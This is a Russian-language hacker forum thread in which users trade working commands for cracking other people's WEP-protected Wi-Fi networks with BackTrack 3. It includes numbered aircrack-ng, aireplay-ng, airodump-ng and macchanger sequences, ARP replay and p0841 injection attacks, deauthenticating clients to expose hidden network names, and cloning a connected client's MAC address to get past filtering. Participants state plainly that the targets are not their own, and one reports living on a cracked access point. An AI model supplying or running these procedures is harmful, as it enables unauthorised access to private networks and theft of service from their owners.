Уважаемый x-demon По сути уже начал сомневаться что я ломаю!Есть такая проблема,сеть которую я пытаюсь поломать скрытая но имя я уже знаю, в ВТ3 когда я над ней работаю в консоли она значится так; BSSID 00:40:96:558:23,PWR 17, RXQ 82, #Data 3565363, CH 7,MB 11,ENC WPA, CIPHER WEP, Auth OPN, в WINDOWS разные проги определяют эту точку как WEP, если есть какие соображения напишите пожалуйста.
Попробуй знаешь что, когда пускаешь aircrack-ng опцию -n поставь 64 бита (или 128, если ставишь 64). У мя такой косяк был Вообще говоря, даже если ты пользуешся не BackTrck'ом вся проблема в длине взамываемого ключа - у тебя выбрана неверно.
seteboz А можешь подсказать как это сделать в ВТ3? и ли в ВТ3 подбор ключа идёт автоматом от 64 битного и выше?
Во-первихъ, aircrack-ng --help. А вообще нет, не автоматом, есть ключ команды aircrack-ng "-n 64" (для ключа 64 бит). Вот пример: aircrack-ng -n 64 -b [bssid-сети вайфай] [filename- файл с перехваченными пакетами]-01.cap http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 По этой ссылке подробная инструкция по взлому WEP в BackTrack 3. Всё проверено всё работает. Возникнут вопросы пиши
Уважаемый seteboz! Попробовал я её сломать с помощью вашей подсказки и по ссылке смотрел,и так и так пробовал,ничего не получилось!Дело в том,что эта точка она скрытая и когда я ловлю с неё пакеты сначало узнаю название её потом как не странно она с WEP WEP переименовывается в WPA WEP шифрование!Рядом есть ещё точки у них шифрование такое WPA2 TKIP ну или чтото в этом роде!Может быть что та точка которую я хочу поломать скрывает не только своё имя но и шифрование с wep превращается в wpa!Какие есть мысли? А где можно хороших словарей скачать,а то меня уже стали окружать одни только WPA?И вообще,есть кто на этом форуме,кто смог изьять ключик на WPA? или ещё мало кто смог преодалеть такую защиту?
я ломаю WEP простым способом ! BT-3 1. #airmon-ng 2. #airmon-ng stop rausb0 { rausb0 это мой драйвер для wi-fi карты поставишь свой какой выдаст airmon } останавливаю Wi-fi карту для смены мак адреса . 3. # ifconfig rausb0 down я пишу этот { 00:55:67:89:55:22 } 4. # macchanger --mac 00:55:67:89:55:22 rausb0 запускаем 5. # airmon-ng start rausb0 видим (monitor mode enabled on rausb0 ) Теперь сканим доступные беспроводные сети, использующие шфрование WEP 6 .# airodump-ng rausb0 остановить airodump клавишами Ctrl + С Остановите airodump-ng и запустите его заново, записывая все пакеты в файл: 7. # airodump-ng -c 11 -w pokemon --bssid 00:1E:4C:B2:A8:47 rausb0 атакуем точку и комп 8. # aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0 запускаем дишифратор 9. # aireplay-ng -3 -b 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0 посе сбора 20 пакетов DATA запускаем aircrack 10. # aircrack-ng -b 00:1E:4C:B2:A8:47 pokemon-01.cap и ждёмс ключ .Очень посто! если на точке висит комп вообще быстро взломаешь и смотри чтоб сигнал был не ниже 17%, выше сигнал успешней взлом ! всё получится ,дерзай ! удачи ,с уважением ко всем участникам сайта # Semby68 # SPAIN- RUSS # И ещо , купил адаптор USB WI-FI мощный , вот ссылка http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/
>>aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0 Я бы при отсутсвии клиентов, да и вообще, использовал бы атаку p0841 - aireplay-ng -2 -p 0841 -e <имя_точки> Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>
я так понял { iwconfig rausb0 channel <n> } это настройка скорости между точкой и моей картой . а атаку , p0841 , попробую , благодарю !# Semby68 #
Semby68 x-demon ОГРОМНОЕ СПАСИБО!!!!!! наконец получилось! я вместо своего мак адреса подставил мак клиента и пакеты посыпались горой в 100 раз быстрее!Удачи вам и процветанию этому сайту! НО ТЕПЕРЬ ВОЗНИКЛА ДРУГАЯ ПРОБЛЕМА!Как подключится к этой точке она же скрытая! использую WIFI Hopper!или есть др.софт для подключения к скрытым точкам?
Скрытую точку обнаружить просто. Надо запустить airodump-ng на канале, на котором висит точка, и ждать пока кто то подключится. Либо вышибить уже подключенного клиента. Как только он подключится - имя точки будет вскрыто.
Уважаемый x-demon Вообщем получилось прописать имя и ключ ,но всё равно не могу подключится видимо там на точке стоит MAC или Ip фильтрация адресов!Может такое быть и как от этого исбавится,как мне изменить MAC и IP адрес чтоб подключится? А как можно узнать ip адрес точки доступа к которой я хочу подключится? и надо же ip знать?
macchanger --mac 11:22:33:44:55:66 wlan0 - значения подставить свои. Нет, если на точке включен DHCP. Если не включен... можно попробовать узнать пул IP адресов с помощью kismet
я так и не понял как MAC менять. Вот что я делаю: # airmon-ng Допустип выдает ath0. Далее останавливаю: # airmon-ng stop ath0 И пытаюсь сменить MAC: # macchanger --mac 00:11:22:33:44:55 ath0 А оно мне типа нет такого устройства. Что я делаю не так?
Блин что там сложного? Code: ifconfig wlan0 down ifconfig wlan0 hw ether 00:11:22:33:44:555 ifconfig wlan0 up airmon-ng start wlan0 airodump-ng mon0
При работе с BT3 или BT4 не происходит сбор #data пакетов, в чём может быть причина? beacon и pockets только собираются. edimax ew-7318USg
Всем привет возникла небольшая проблемка по подключению к сети сеть сама по себе открытая но стоит фильтрация по macу и вроде бы все легко (заменить свой адресс на другой зареганный в сети) но при замене к точке хрен подключишься она меня просто игнорит адаптер edimax 7128g (чип rt2501)
Kortez а рядом с точкой есть клиент?тоесть подключён к ней кто? igor29 Попробуй IP адрес у себя прописать,у меня была такая проблема!сначала ключик добыл с помощю ВТ3,а потом прописал мак его клиента, не мог подключится!а потом думаю дай я с ip адресами побалуюсь,прописал в насторойках wifi карты 192.168.1.2,и всё стало мне счастье!сейчас сижу на точке,правда пока клиент в сети я не могу подключится,но он редко бывает!Так что удачи!
